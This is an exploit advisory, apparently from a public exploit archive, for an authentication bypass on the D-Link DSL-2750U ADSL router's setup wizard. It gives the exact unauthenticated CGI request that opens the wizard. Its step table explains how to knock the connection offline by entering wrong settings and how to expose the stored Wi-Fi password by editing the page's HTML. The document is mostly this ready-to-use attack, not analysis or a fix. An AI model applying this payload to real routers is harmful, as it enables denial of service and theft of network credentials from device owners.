○ • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • ○ • ██╗ ██╗███████╗ █████╗ ██████╗ ██████╗ • • ██║ ██║╚══███╔╝██╔══██╗██╔══██╗██╔══██╗ • • ██║ ██║ ███╔╝ ███████║██████╔╝██║ ██║ • • ██║ ██║ ███╔╝ ██╔══██║██╔══██╗██║ ██║ • • ███████╗██║███████╗██║ ██║██║ ██║██████╔╝ • • ╚══════╝╚═╝╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝ • • # Exploit Title: Setup Wizard Page Authentication Bypass {Denial Of Service & Information Leakage} • • # Exploit Author: Admin_JOKER • • # Email: Joker.Ktm314@gmail.com • • # Date: 2018-08-23 • • # Category: Webapps • • # Vendor Homepage:https://www.dlink.com.sg/product/dsl-2750u-n300-wireless-adsl2-4-port-wi-fi-router/ • • # Tesed on: DSL-2750U • • # Firmware Version: 1.11 / Work All Older Firmware • • # Video : https://youtu.be/BQQbp2vn_wY • ○ • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • ○ URL: http://[Router IP]/ Example URL : http://192.168.1.1 Payload : /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:subpage=wizentrance&var:page=wizard Example Payload : /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:subpage=wizentrance&var:page=wizard +-----------------------------------------------Setup Wizard Pages-----------------------------------------------------+ |Step 1: Set Time and Date (No matter) | |Step 2: Setup Internet Connection (Give wrong information >> Denial of Service) | |Step 3: Configure Wireless Network (Change Type="password" to Type="text" in html code >> Information Leakage) | |Step 4: Set Password (Skip this Step ) | |Step 5: Completed and Quit (Finish) | +----------------------------------------------------------------------------------------------------------------------+